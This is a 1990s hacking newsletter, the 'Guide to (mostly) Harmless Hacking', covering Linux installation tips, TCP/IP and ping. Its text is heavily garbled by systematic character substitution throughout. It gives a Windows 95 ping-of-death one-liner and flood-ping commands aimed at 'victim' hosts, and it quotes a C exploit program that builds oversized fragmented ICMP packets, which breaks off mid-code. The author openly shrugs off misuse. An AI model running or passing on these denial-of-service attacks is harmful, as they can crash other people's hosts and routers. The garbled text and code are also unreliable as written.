.eginner'8 and Smalltalk-S > U %sometimes called U03indo3s'8 a gra12ical user interface > utilit& 1rograms suc2 as t2e email reader Pine %m& fa9orite' and #lm To1 ten reasons to install Linux on &our PC: /-=2en Linux is outla3ed8 onl& outla3s 3ill o3n Linux2- =2en installing Linux8 it is so muc2 fun to run fdisk 3it2out .acking u1 first@-T2e flames &ou get from asking Huestions on Linux ne3sgrou1s are of a 2ig2er Hualit& t2an t2e flames &ou get for 1osting to alt-sex-.estialit&M-,o matter 32at fla9or of Linux &ou install8 &ouIll find out tomorro3 t2ere 3as a far more @l/te ersion &ou s2ould 2a9e gotten instead-

L-Peo1le 32o use ?ree 5SD or Solaris 3ill not make fun of &ou- T2e& 3ill offer t2eir s&m1at2& insteadB-(t t2e next Def Con &ouIll .e a.le to sa& stu12 like Gso t2en I su0ed to 2is account and gre11ed all 2is files for Ikiss&faceI-G $o1s8 gre11ing ot2er 1eo1leIs files is a no0 no8 forget I e9er suggested itE-Port surf in 1ri9ac&A-$ne 3ord: ex1loitsF-Installing Linux on &our office PC is like .eing a 1ostal 3orker and .ringing an "4i to 3ork/C-5ut 0 0 if &ou install Linux on &our office com1uter8 &ou .oss 3onIt 2a9e a clue 32at t2at means=2at t&1es of Linux 3ork .est: It de1ends on 32at &ou reall& 3ant- )ed2at Linux is famed for .eing t2e easiest to install- T2e =alnut Creek Linux @-C CD0)$* set is also reall& eas& to install 00 for Linux8 t2at is! *& a11roac2 2as .een to get lots of Linux 9ersions and mix and matc2 t2e .est from eac2 distri.utionI like t2e =alnut Creek 9ersion .est .ecause 3it2 m& .rand U 2ard3are8 its autodetection feature 3as a life0 sa9erI,ST(LLI,! LI,"U is not for t2e faint of 2eart! Se9eral ti1s for sur9i9ing installation are: /' (lt2oug2 &ou in t2eor& can run Linux on a 2AB 3it2 M *5 )(* and t3o flo11& dri9es8 it is >muc2> easier 3it2 a MAB or a.o9e 3it2 A *5 )(*8 a CD0)$*8 and at least 2CC *5 free 2ard disk s1ace2' +no3 as muc2 as 1ossi.le a.out 32at t&1e of mot2er .oard8 modem8 2ard disk8 CD0)$*8 and 9ideo card &ou 2a9e- If &ou 2a9e an& documentation for t2ese8 2a9e t2em on 2and to reference during installation@' It 3orks .etter to use 2ard3are t2at is name0 .rand and some32at out0 of0 date on &our com1uter- 5ecause Linux is free3are8 it doesnIt offer de9ice dri9ers for all t2e latest 2ard3are(nd if &our 2ard3are is like mine 00 lots of 5rand U and #l C2ea1o stu128 &ou can take a long time ex1erimenting 3it2 32at dri9ers 3ill 3orkM' 5efore .eginning installation8 .ack u1 &our 2ard disk%s'! In t2eor& &ou can install Linux 3it2out 2arming &our D$S/=indo3s files- 5ut 3e are all 2uman8 es1eciall& if follo3ing t2e ad9ice of 1oint E'L' !et more t2an one Linux distri.ution- T2e first time I successfull& installed Linux8 I finall& 2it on somet2ing t2at 3orked .& using t2e .oot disk from one distri.ution 3it2 t2e CD0)$* for anot2erIn an& case8 eac2 Linux distri.ution 2ad different utilit& 1rograms8 o1erating s&stem emulators8 com1ilers and more- (dd t2em all to &our s&stem and &ou 3ill .e set u1 to .ecome .e&ond eliteB' 5u& a .ook or t3o or t2ree on Linux- I didnIt like an& of t2em! 5ut t2e& are .etter t2an not2ing*ost .ooks on Linux come 3it2 one or t3o CD0)$*s t2at can .e used to install Linux- 5ut I found t2at 32at 3as in t2e .ooks did not exactl& coincide 3it2 32at 3as on t2e CD0)$*sE' I recommend drinking 32ile installing- It ma& not make de.ugging go an& faster8 .ut at least &ou 3onIt care 2o3 2ard it is,o3 I can almost guarantee t2at e9en follo3ing all t2ese B 1ieces of ad9ice8 &ou 3ill still 2a9e 1ro.lems installing Linux- $28 do I 2a9e E ad9isories u1 t2ere: ?orget num.er E- 5ut .e of good c2eer- Since e9er&one else also suffers mig2til& 32en installing and using Linux8 t2e Internet 2as an incredi.le 3ealt2 of resources for t2e Linux 0c2allengedIf &ou are allergic to getting flamed8 &ou can start out 3it2 Linux su11ort =e. sitesT2e .est I 2a9e found is 2tt1://sunsite-unc-edu:/1u./Linux/- It includes t2e Linux ?reHuentl& (sked Juestions list %?(J'8 a9aila.le from sunsite-unc-edu:/1u./Linux/docs/?(JIn t2e director& /1u./Linux/docs on sunsite-unc-edu &ouIll find a num.er of ot2er documents a.out Linux8 including t2e Linux I,?$0SH##T and *#T(0?(J8 T2e Linux H$=T$ arc2i9e is on t2e sunsite-unc-edu =e. site at: /1u./Linux/docs/H$=T$- T2e director& /1u./Linux/docs/LDP contains t2e current set of LDP manualsDou can get VVLinux Installation and !etting StartedII from sunsite-unc-edu in /1u./Linux/docs/LDP/install0 guide- T2e )#(D*# file t2ere descri.es 2o3 &ou can order a 1rinted co1& of t2e .ook of t2e same name %a.out /AC 1ages',o3 if &ou donIt mind getting flamed8 &ou ma& 3ant to 1ost Huestions to t2e ama4ing num.er of "senet ne3s grou1s t2at co9er Linux- T2ese include: com1-os-linux-ad9ocac& 5enefits of Linux com1ared

com1-os-linux-de9elo1ment-s&stem Linux kernels8 de9ice dri9ers com1-os-linux-x Linux U =indo3 S&stem ser9ers com1-os-linux-de9elo1ment-a11s =riting Linux a11lications com1-os-linux-2ard3are Hard3are com1ati.ilit& com1-os-linux-setu1 Linux installation com1-os-linux-net3orking ,et3orking and communications com1-os-linux-ans3ers ?(Js8 Ho30 ToIs8 )#(D*#s8 etclinux-red2at-misc alt-os-linux "se com1-os-linux-> instead alt-uu-com1-os-linux-Huestions "senet "ni9ersit& 2el1s &ou com1-os-linux-announce (nnouncements im1ortant to Linux com1-os-linux-misc Linux0 s1ecific to1ics =ant &our Linux free: To.in ?ricke 2as 1ointed out t2at Gfree co1ies of Linux CD0)$*s are a9aila.le t2e Linux Su11ort W CD !i9a3a& 3e. site at 2tt1://emile-mat2-ucs.-edu:ACCC/gi9ea3a&-2t ml- T2is is a 1ro7ect 32ere 1eo1le donate Linux CDIs t2at t2e& donIt need an& more- T2e 1ro7ect 3as seeded .& Linux S&stems La.s8 32o donated ACC Linux CDs initiall&! Please remem.er to donate &our Linux CDIs 32en &ou are done 3it2 t2em- If &ou li9e near a com1uter s3a1 meet8 ?r&Is8 *icrocenter8 or ot2er suc2 1lace8 look for Linux CDIs t2ere- T2e& are usuall& under Q2C8 32ic2 is an excellent in9estment- I 1ersonall& like t2e Linux De9elo1erIs )esource .& Infomagic8 32ic2 is no3 u1 to a se9en CD set8 I .elie9e8 32ic2 includes all ma7or Linux distri.utions %Slack3are8 )ed2at8 De.ian8 Linux for D#C (l12a to name a fe3'1lus mirrors of tsx//-mit-edu and sunsite-unc-edu/1u./linux 1lus muc2 more- Dou s2ould also 9isit t2e =$,D#)?"L linux 1age at 2tt1://sunsite-unc-edu/linux8 32ic2 2as tons of information8 as 3ell as t2e 2tt1://333-linux-org/- Dou mig2t also 3ant to c2eck out 2tt1://333-red2at-com/ and 2tt1://333-caldera-com/ for more information on commercial 9ersions of linux %32ic2 are still freel& a9aila.le under !,"'-G Ho3 a.out Linux securit&: Des8 Linux8 like e9er& o1erating s&stem8 is im1erfect- #minentl& 2acka.le8 if &ou reall& 3ant to kno3- So if &ou 3ant to find out 2o3 to secure &our Linux s&stem8 or if &ou s2ould come across one of t2e man& ISPs t2at use Linux and 3ant to go ex1loring %oo1s8 forget I 3rote t2at'8 2ereIs 32ere &ou can go for info: ft1://info-cert-org/1u./cert ad9isories/C(0 FM:C/-net3ork-monitoring-attacks ft1://info-cert-org/1u./tec2 ti1s/root com1romise 2tt1://.ac2-cis-tem1le-edu/linux/linux0 securit&/ 2tt1://333-geek0 girl-com/.ugtraH/ T2ere is also 2el1 for Linux users on Internet )ela& C2at %I)C'- 5en %c&.erkidKusa-net' 2osts a c2annel called XLinuxHel1 on t2e "ndernet I)C ser9erLast .ut not least8 if &ou 3ant to ask Linux Huestions on t2e Ha11& Hacker list8 &ouIre 3elcome=e ma& .e t2e .lind leading t2e .lind8 .ut 32at t2e 2eck! Co1&rig2t /FFB Carol&n P- *einel- Dou ma& for3ard t2e !"ID# T$ %mostl&' H()*L#SS H(C+I,! as long as &ou lea9e t2is notice at t2e end!"ID# T$ %mostl&' H()*L#SS H(C+I,! Vol- 2 ,um.er @ Introduction to TCP/IP- T2at means 1ackets! Datagrams! Ping o9ersi4e 1acket denial of ser9ice ex1loit ex1lained- 5ut t2is 2ack is a lot less mostl& 2armless t2an most- DonIt tr& t2is at 2ome--If &ou 2a9e .een on t2e Ha11& Hacker list for a32ile8 &ouI9e .een getting some items for3arded from t2e 5ugtraH list on a ne3 1ing 1acket ex1loit,o3 if t2is 2as .een sounding like gi..eris2 to &ou8 relax- It is reall& 9er& sim1le- In fact8 it is so sim1le t2at if &ou use =indo3s FL8 .& t2e time &ou finis2 t2is article &ou 3ill kno3 a sim1le8 one0 line command t2at &ou could use to cras2 man& Internet 2osts and routers-

>>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > D$" C(, !$ T$ N(IL =(),I,!: T2is time IIm not going to im1lore t2e 3anna.e e9il genius t&1es on t2is list to .e 9irtuous and resist t2e tem1tation to misuse t2e information IIm a.out to gi9e t2em- See if I care! If one of t2ose gu&s gets caug2t cras2ing t2ousands of Internet 2osts and routers8 not onl& 3ill t2e& go to 7ail and get a .ig fine- =eIll all t2ink 2e or s2e is a dork- T2is ex1loit is a no0 .rainer8 one0 line command from =indo3s FL- Dea28 t2e o1erating s&stem t2at is designed for clueless morons- So t2ere is not2ing elite a.out t2is 2ack- =2at is elite is .eing a.le to t23art t2is attack>>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > ,#=5I# ,$T#: If 1ackets8 datagrams8 and TCP/IP arenIt exactl& &our .osom .uddies &et8 .elie9e me8 &ou need to reall& get in .ed 3it2 t2em in order to call &ourself a 2acker- So 2ang in 2ere for some tec2nical stuff- =2en 3e are done8 &ouIll 2a9e t2e satisfaction of kno3ing &ou could 3reak 2a9oc on t2e Internet8 .ut are too elite to do so( 1acket is a 3a& to send information electronicall& t2at kee1s out errors- T2e idea is t2at no transmission tec2nolog& is 1erfect- Ha9e &ou e9er 1la&ed t2e game Gtele12oneG: Dou get a do4en or so 1eo1le in a circle and t2e first 1erson 32is1ers a message to t2e second- Somet2ing like GT2e .un is t2e lo3est form of 32eat-G T2e second 1erson 32is1ers to t2e t2ird8 G( .um is t2e lo3est form of c2eating-G T2e t2ird 32is1ers8 G)um is t2e lo3est form of drinking-G (nd so on- ItIs reall& fun to find out 2o3 far t2e message can mutate as it goes around t2e circle5ut 32en8 for exam1le8 &ou get email8 &ou 3ould 1refer t2at it isnIt messed u1- So t2e com1uter t2at sends t2e email .reaks it u1 into little 1ieces called datagrams- T2en it 3ra1s t2ings around eac2 datagram t2at tell 32at com1uter it needs to go to8 32ere it came from8 and t2at c2eck 32et2er t2e datagram mig2t 2a9e .een gar.led- T2ese 3ra11ed u1 datagram 1ackages are called G1ackets-G ,o3 if t2e com1uter sending email to &ou 3ere to 1ackage a reall& long message into 7ust one 1acket8 c2ances are 1rett& 2ig2 t2at it 3ill get messed u1 32ile on its 3a& to t2e ot2er com1uter5it .ur1s- So 32en t2e recei9ing com1uter c2ecks t2e 1acket and finds t2at it got messed u18 it 3ill t2ro3 it a3a& and tell t2e ot2er com1uter to send it again- It could take a long time until t2is giant 1acket gets t2roug2 intact5ut if t2e message is .roken into a lot of little 1ieces and 3ra11ed u1 into .unc2es of 1ackets8 most of t2em 3ill .e good and t2e recei9ing com1uter 3ill kee1 t2em- It 3ill t2en tell t2e sending com1uter to retransmit 7ust t2e 1ackets t2at messed u1- T2en 32en all t2e 1ieces finall& get t2ere8 t2e recei9ing com1uter 1uts t2em toget2er in t2e rig2t order and lo and .e2old8 t2ere is t2e com1lete8 error0 free emailTCP/IP stands for Transmission Control Protocol/Internet Protocol- It tells com1uters t2at are 2ooked u1 to t2e Internet 2o3 to 1ackage u1 messages into 1ackets and 2o3 to read 1ackets t2ese 1ackets from ot2er com1uters- Ping uses TCP/IP to make its 1ackets>>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > GPingG is a command t2at sends a feeler out from &our com1uter to anot2er com1uter to see if it is turned on and 2ooked to t2e same net3ork &ou are on- $n t2e Internet t2ere are some ten million com1uters t2at &ou can 1ingPing is a command &ou can gi9e8 for exam1le8 from t2e "nix8 =indo3s FL and =indo3s ,T o1erating s&stems- It is 1art of t2e Internet Control *essage Protocol %IC*P'8 32ic2 is used to trou.les2oot TCP/IP net3orks- =2at it does is tell a remote com1uter to ec2o .ack a 1ing- So if &ou get &our 1ing .ack8 &ou kno3 t2at com1uter is ali9e- ?urt2ermore8 some forms of t2e 1ing command 3ill also tell &ou 2o3 long it takes for a message to go out to t2at com1uter and come .ack again5ut 2o3 does &our com1uter kno3 t2at t2e 1ing it 7ust sent out actuall& ec2oed .ack from t2e targeted com1uter: T2e datagram is t2e ans3er- T2e 1ing sent out a datagram- If t2e returning 1ing 2olds t2is same datagram8 &ou kno3 it 3as &our 1ing t2at 7ust ec2oed .ackT2e .asic format of t2is command is sim1l&: 1ing 2ostname 32ere G2ostnameG is t2e Internet address of t2e com1uter &ou 3ant to c2eck out=2en I gi9e t2is command from Sun )elease M-/ "nix8 I get t2e ans3er G2ostname is ali9e-G

>>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > T#CH,IC(L TIP: 5ecause of t2e destructi9e 1o3ers of 1ing8 man& Internet Ser9ice Pro9iders 2ide t2e 1ing 1rogram in t2eir s2ell accounts 32ere clueless ne3.ies canIt get t2eir 2ands on it- If &our s2ell account sa&s Gcommand not foundG 32en &ou enter t2e 1ing command8 tr&: /usr/etc/1ing 2ostname If t2is doesnIt 3ork8 eit2er tr& t2e command ;32ereis 1ing< or com1lain to &our ISPIs tec2 su11ort- T2e& ma& 2a9e ddia.led 1ing for ordinar& users8 .ut if &ou con9ince tec2 su11ort &ou are a good Internet citi4en t2e& ma& let &ou use it>>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > ,#=5I# ,$T#: Dou sa& &ou canIt find a 3a& to 1ing from &our on0 line ser9ice: T2at ma& .e .ecause &ou donIt 2a9e a s2ell account- 5ut t2ere is one t2ing &ou reall& need in order to 2ack: ( SH#LL (CC$",T!!!! T2e reason 2ackers make fun of 1eo1le 3it2 (merica $nline accounts is .ecause t2at ISP doesnIt gi9e out s2ell accounts- T2is is .ecause (merica $nline 3ants &ou to .e good .o&s and girls and not 2ack! ( Gs2ell accountG is an Internet account in 32ic2 &our com1uter .ecomes a terminal of one of &our ISPIs 2ost com1uters- $nce &ou are in t2e Gs2ellG &ou can gi9e commands to t2e o1erating s&stem %32ic2 is usuall& "nix' 7ust like &ou 3ere sitting t2ere at t2e console of one of &our ISPIs 2ostsDou ma& alread& 2a9e a s2ell account .ut 7ust not kno3 2o3 to log on to it- Call tec2 su11ort 3it2 &our ISP to find out 32et2er &ou 2a9e one8 and 2o3 to get on it>>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > T2ere are all sorts of fanc& 9ariations on t2e 1ing command- (nd8 guess 32at8 32ene9er t2ere is a command &ou gi9e o9er t2e Internet t2at 2as lots of 9ariations8 &ou can 7ust a.out count on t2ere .eing somet2ing 2acka.le in t2ere- *u2a2a2a! T2e flood 1ing is a sim1le exam1le- If &our o1erating s&stem 3ill let &ou get a3a& 3it2 gi9ing t2e command: 0P 1ing 0f 2ostname it sends out a 9erita.le flood of 1ings8 as fast as &our ISPIs 2ost mac2ine can make t2em- T2is kee1s t2e 2ost &ouI9e targeted so .us& ec2oing .ack &our 1ings t2at it can do little else- It also 1uts a 2ea9& load on t2e net3orkHackers 3it2 1rimiti9e skill le9els 3ill sometimes get toget2er and use se9eral of t2eir com1uters at once to simultaneousl& 1ing some 9ictimIs Internet 2ost com1uter- T2is 3ill generall& kee1 t2e 9ictimIs com1uter too .us& to do an&t2ing else- It ma& e9en cras2- Ho3e9er8 t2e do3n side %from t2e attackersI 9ie31oint' is t2at it kee1s t2e attackersI com1uters tied u18 too>>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > ,#TIJ"#TT# ,$T#: ?lood 1inging a com1uter is extremel& rude- !et caug2t doing t2is and &ou 3ill .e luck& if t2e 3orst t2at 2a11ens is &our on0 line ser9ice 1ro9ider closes &our account- Do t2is to a serious 2acker and &ou ma& need an identit& trans1lantIf &ou s2ould start a flood 1ing kind of .& accident8 &ou can s2ut it off .& 2olding do3n t2e control ke& and 1ressing GcG %control0 c'>>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > > > > > #VIL !#,I"S TIP: Ping &ourself! If &ou are using some sort of "nix8 &our o1erating s&stem 3ill let &ou use &our com1uter to do 7ust a.out an&t2ing to itself t2at it can do to ot2er com1uters- T2e net3ork address t2at takes &ou .ack to &our o3n 2ost com1uter is local2ost %or /2E-C-C-/'- HereIs an exam1le of 2o3 I use local2ost: Oslug P YBLZ 0Ptelnet local2ost Tr&ing /2E-C-C-/ --Connected to local2ost#sca1e c2aracter is I [Z ISun$S ",IU %slug'

login: See8 IIm .ack to t2e login seHuence for t2e com1uter named GslugG all o9er again,o3 I 1ing m&self: Ollama P YBAZ 0P/usr/etc/1ing local2ost local2ost is ali9e T2is gi9es t2e same result as if I 3ere to command: Ollama P YBFZ 0P/usr/etc/1ing llama llama-s3c1-com is ali9e >>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > *"H(H(H( TIP: =ant to &ank someoneIs c2ain: Tell 2im to ft1 to /2E-C-C-/ and log in using 2is or 2er o3n user name and 1ass3ord for ke3l 3are4! *& ex0 2us.and +eit2 Henson did t2at to t2e C2urc2 of Scientolog&- T2e C$!s ft10 ed to /2E-C-C-/ and disco9ered all t2eir co1&rig2ted scri1tures- T2e& assumed t2is 3as on +eit2Is com1uter8 not t2eirs- T2e& 3ere >so> sure 2e 2ad t2eir scri1tures t2at t2e& took 2im to court- T2e 7udge8 32en 2e reali4ed t2e& 3ere sim1l& loo1ing .ack to t2eir o3n com1uter8 literall& laug2ed t2em out of court?or a 2ilarious transcri1t or audio ta1e of t2is infamous court session8 email 2k2ensonKcu1-1ortal-com- T2atIs +eit2Is email address- *& 2at is off to a su1er. 2acker! >>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > Ho3e9er8 t2e o9ersi4e 1ing 1acket ex1loit &ou are a.out to learn 3ill do e9en more damage to some 2osts t2an a gang of flood 1ing cons1irators- (nd it 3ill do it 3it2out t&ing u1 t2e attackersI com1uter for an& longer t2an t2e s1lit second it takes to send out 7ust one 1ingT2e easiest 3a& to do t2is 2ack is to run =indo3s FL- DonIt 2a9e it: Dou can generall& find a #l C2ea1o store t2at 3ill sell it to &ou for QFFTo do t2is8 first set u1 &our =indo3s FL s&stem so t2at &ou can make a PPP or SLIP connection 3it2 t2e Internet using t2e Dialu1 ,et3orking 1rogram under t2e *& Com1uter icon- Dou ma& need some 2el1 from &our ISP tec2 su11ort in setting t2is u1- Dou must do it t2is 3a& or t2is 2ack 3onIt 3ork- Dour (merica $nline dialer >definitel&> 3ill not 3ork>>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > > > > ,#=5I# ,$T#: If &our Internet connection allo3s &ou to run a =e. .ro3ser t2at s2o3s 1ictures8 &ou can use t2at dialu1 num.er 3it2 &our =indo3s FL Dialu1 ,et3orking 1rogram to get eit2er a PPP or SLIP connection>>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > > > > ,ext8 get &our connected to t2e Internet- 5ut donIt run a .ro3ser or an&t2ing- Instead8 once &our Dialu1 ,et3orking 1rogram tell &ou t2at &ou 2a9e a connection8 click on t2e GStartG .utton and go to t2e listing G*S0D$S-G $1en t2is D$S 3indo3- DouIll get a 1rom1t: C:\3indo3s\ P ,o3 letIs first do t2is t2e good citi4en 3a&- (t t2is 1rom1t &ou can t&1e in a 1lain ordinar& G1ingG command: C:\3indo3s\1ing 2ostname 32ere G2ostnameG is t2e address of some Internet com1uter- ?or exam1le8 &ou could 1ing t2ales-nmia-com8 32ic2 is one of m& fa9orite com1uters8 named after an o.scure !reek 12iloso12er,o3 if &ou 2a11ened to kno3 t2e address of one of Saddam HusseinIs com1uters8 2o3e9er8 &ou mig2t 3ant to gi9e t2e command: c:\3indo3s\1ing 0l BLL/C saddam 2usseinIs-com1uter-mil ,o3 donIt reall& do t2is to a real com1uter! Some8 .ut not all8 com1uters 3ill cras2 and eit2er remain 2ung or re.oot 32en t2e& get t2is 1ing- $t2ers 3ill continue 3orking c2eeril& along8 and t2en suddenl& go under 2ours later=2&: T2at extra added 0l BLL/C creates a giant datagram for t2e 1ing 1acket- Some com1uters8 32en asked to send .ack an identical datagram8 get reall& messed u1If &ou 3ant all t2e gor& details on t2is 1ing ex1loit8 including 2o3 to 1rotect &our com1uters from it8 c2eck out 2tt1://333-so12ist-demon-co-uk/1ing-

,o3 t2ere are ot2er 3a&s to manufacture a giant 1ing datagram .esides using =indo3s FL- ?or exam1le8 if &ou run certain ?ree5SD or Linux 9ersions of "nix on &our PC8 &ou can run t2is 1rogram8 32ic2 3as 1osted to t2e 5ugtraH list?rom: 5ill ?enner OfennerKfreefall-free.sd-org P To: *ulti1le reci1ients of list 5"!T)(J O5"!T)(JKnets1ace-org P Su.7ect: Ping ex1loit 1rogram Since some 1eo1le donIt necessaril& 2a9e =indo3s IFL .oxes l&ing around8 I %?enner' 3rote t2e follo3ing ex1loit 1rogram- It reHuires a ra3 socket la&er t2at doesnIt mess 3it2 t2e 1acket8 so 5SD M-@8 Sun$S and Solaris are out- It 3orks fine on M-M5SD s&stems- It s2ould 3ork on Linux if &ou com1ile 3it2 0D)#(LLD )(=?eel free to do 3it2 t2is 32at &ou 3ant- Please use t2is tool onl& to test &our o3n mac2ines8 and not to cras2 ot2ersI> 3inFL1ing-c > > Simulate t2e e9il 3inFL G1ing 0l BLL/C .ugg&2ostG> 9ersion /-C 5ill ?enner OfennerKfree.sd-org P 220 $ct0 /FFB > > T2is reHuires ra3 sockets t2at donIt mess 3it2 t2e 1acket at all %ot2er > t2an adding t2e c2ecksum'- T2at means t2at Sun$S8 Solaris8 and > 5SDM-@0 .ased s&stems are out- 5SDM-M s&stems %?ree5SD8 ,et5SD8 > $1en5SD8 5SDI' 3ill 3ork- Linux mig2t 3ork8 I donIt 2a9e a Linux > s&stem to tr& it on> > T2e attack from t2e =inFL .ox looks like: > /E:2B://-C/@B22 csl3inFL P arkro&al: icm1: ec2o reHuest %frag B/MM:/MACKC T' > /E:2B://-C/LCEF csl3inFL P arkro&al: %frag B/MM:/MACK/MAC T ' > /E:2B://-C/BB@E csl3inFL P arkro&al: %frag B/MM:/MACK2FBC T ' > /E:2B://-C/ELEE csl3inFL P arkro&al: %frag B/MM:/MACKMMMC T ' > /E:2B://-C/AA@@ csl3inFL P arkro&al: %frag B/MM:/MACKLF2C T ' > /E:2B://-C2C//2 csl3inFL P arkro&al: %frag B/MM:/MACKEMCC T ' > /E:2B://-C2/@MB csl3inFL P arkro&al: %frag B/MM:/MACKAAAC T > /E:2B://-C22BM/ csl3inFL P arkro&al: %frag B/MM:/MACK/C@BC T ' > /E:2B://-C2@ABF csl3inFL P arkro&al: %frag B/MM:/MACK//AMC T ' > /E:2B://-C2L/MC csl3inFL P arkro&al: %frag B/MM:/MACK/@@2C T ' > /E:2B://-C2BBCM csl3inFL P arkro&al: %frag B/MM:/MACK/MACC T ' > /E:2B://-C2EB2A csl3inFL P arkro&al: %frag B/MM:/MACK/B2AC T ' > /E:2B://-C2AAE/ csl3inFL P arkro&al: %frag B/MM:/MACK/EEBC T ' > /E:2B://-C@C/CC csl3inFL P arkro&al: %frag B/MM:/MACK/F2MC T ' > /E:2B://-C@/@CE csl3inFL P arkro&al: %frag B/MM:/MACK2CE2C T ' > /E:2B://-C@2LM2 csl3inFL P arkro&al: %frag B/MM:/MACK222CC T ' > /E:2B://-C@@EEM csl3inFL P arkro&al: %frag B/MM:/MACK2@BAC T ' > /E:2B://-C@LC/A csl3inFL P arkro&al: %frag B/MM:/MACK2L/BC T ' > /E:2B://-C@BLEB csl3inFL P arkro&al: %frag B/MM:/MACK2BBMC T ' > /E:2B://-C@EMBM csl3inFL P arkro&al: %frag B/MM:/MACK2A/2C T ' > /E:2B://-C@ABFB csl3inFL P arkro&al: %frag B/MM:/MACK2FBCC T ' > /E:2B://-C@FFBB csl3inFL P arkro&al: %frag B/MM:/MACK@/CAC T ' > /E:2B://-CM/2/A csl3inFL P arkro&al: %frag B/MM:/MACK@2LBC T ' > /E:2B://-CM2LEF csl3inFL P arkro&al: %frag B/MM:/MACK@MCMC T ' > /E:2B://-CM@ACE csl3inFL P arkro&al: %frag B/MM:/MACK@LL2C T ' > /E:2B://-CMB2EB csl3inFL P arkro&al: %frag B/MM:/MACK@ECCC T ' > /E:2B://-CME2@B csl3inFL P arkro&al: %frag B/MM:/MACK@AMAC T ' > /E:2B://-CMAMEA csl3inFL P arkro&al: %frag B/MM:/MACK@FFBC T ' > /E:2B://-CMFBFA csl3inFL P arkro&al: %frag B/MM:/MACKM/MMC T ' > /E:2B://-CLCF2F csl3inFL P arkro&al: %frag B/MM:/MACKM2F2C T ' > /E:2B://-CL2/BM csl3inFL P arkro&al: %frag B/MM:/MACKMMMCC T '

> /E:2B://-CL@@FA > /E:2B://-CLMBAL > /E:2B://-CLB@ME > /E:2B://-CLE@/@ > /E:2B://-CLA@LE > /E:2B://-CLFLAA > /E:2B://-CBCEAE > /E:2B://-CB2C2@ > /E:2B://-CB@2ME > /E:2B://-CBMMEF > /E:2B://-CBB2L2 > /E:2B://-CBBFLE > /E:2B://-CBA22C > /E:2B://-CBF/CE > >/ Xinclude Xinclude Xinclude Xinclude Xinclude Xinclude Xinclude Xinclude

csl3inFL csl3inFL csl3inFL csl3inFL csl3inFL csl3inFL csl3inFL csl3inFL csl3inFL csl3inFL csl3inFL csl3inFL csl3inFL csl3inFL

P P P P P P P P P P P P P P

arkro&al: arkro&al: arkro&al: arkro&al: arkro&al: arkro&al: arkro&al: arkro&al: arkro&al: arkro&al: arkro&al: arkro&al: arkro&al: arkro&al:

%frag %frag %frag %frag %frag %frag %frag %frag %frag %frag %frag %frag %frag %frag

B/MM:/MACKMLAAC T ' B/MM:/MACKME@BC T ' B/MM:/MACKMAAMC T ' B/MM:/MACKLC@2C T ' B/MM:/MACKL/ACC T ' B/MM:/MACKL@2AC T ' B/MM:/MACKLMEBC T ' B/MM:/MACKLB2MC T ' B/MM:/MACKLEE2C T ' B/MM:/MACKLF2CC T ' B/MM:/MACKBCBAC T ' B/MM:/MACKB2/BC T ' B/MM:/MACKB@BMC T ' B/MM:@FAKBL/2C'

Ostdio-2 P Os&s/t&1es-2 P Os&s/socket-2 P Onetd.-2 P Onetinet/in-2 P Onetinet/in s&stm-2 P Onetinet/i1-2 P Onetinet/i1 icm1-2 P

/> > If &our kernel doesnIt muck 3it2 ra3 1ackets8 Xdefine )#(LLD )(=> T2is is 1ro.a.l& onl& Linux>/ Xifdef )#(LLD )(= Xdefine ?IU%x' 2tons%x' Xelse Xdefine ?IU%x' %x' Xendif int main%int argc8 c2ar >>arg9' ] int sS c2ar .ufY/LCCZS struct i1 >i1 ^ %struct i1 >'.ufS struct icm1 >icm1 ^ %struct icm1 >'%i1 T /'S struct 2ostent >21S struct sockaddr in dstS int offsetS int on ^ /S .4ero%.uf8 si4eof .uf'S if %%s ^ socket%(? I,#T8 S$C+ )(=8 IPP)$T$ IP'' O C' ] 1error%GsocketG'S exit%/'S _ if %setsocko1t%s8 IPP)$T$ IP8 IP HD)I,CL8 Won8 si4eof%on'' O C' ] 1error%GIP HD)I,CLG'S exit%/'S _

if %argc ! ^ 2' ] f1rintf%stderr8 Gusage: Rs 2ostname\nG8 arg9YCZ'S exit%/'S _ if %%21 ^ get2ost.&name%arg9Y/ Z'' ^ ^ ,"LL' ] if %%i10 Pi1 dst-s addr ^ inet addr%arg9Y/Z'' ^ ^ 0/' ] f1rintf%stderr8 GRs: unkno3n 2ost\nG8 arg9Y/Z'S _ _ else ] .co1&%210 P2 addr listYCZ8 Wi10 Pi1 dst-s addr8 210 P2 lengt2'S _ 1rintf%GSending to Rs\nG8 inet ntoa%i10 Pi1 dst''S i10 Pi1 9 ^ MS i10 Pi1 2l ^ si4eof >i1 P P 2S i10 Pi1 tos ^ CS i10 Pi1 len ^ ?IU%si4eof .uf'S i10 Pi1 id ^ 2tons%M@2/'S i10 Pi1 off ^ ?IU%C'S i10 Pi1 ttl ^ 2LLS i10 Pi1 1 ^ /S i10 Pi1 sum ^ CS /> kernel fills in >/ i10 Pi1 src-s addr ^ CS /> kernel fills in >/ dst-sin addr ^ i10 Pi1 dstS dst-sin famil& ^ (? I,#TS icm10 Picm1 t&1e ^ IC*P #CH$S icm10 Picm1 code ^ CS icm10 Picm1 cksum ^ 2tons% `%IC*P #CH$ O O A''S /> t2e c2ecksum of all CIs is eas& to com1ute >/ for %offset ^ CS offset O BLL@BS offset T ^ %si4eof .uf 0 si4eof >i1'' ] i10 Pi1 off ^ ?IU%offset P P @'S if %offset O BL/2C' i10 Pi1 off a^ ?IU%IP *?'S else i10 Pi1 len ^ ?IU%M/A'S /> make total BLL@A >/ if %sendto%s8 .uf8 si4eof .uf8 C8 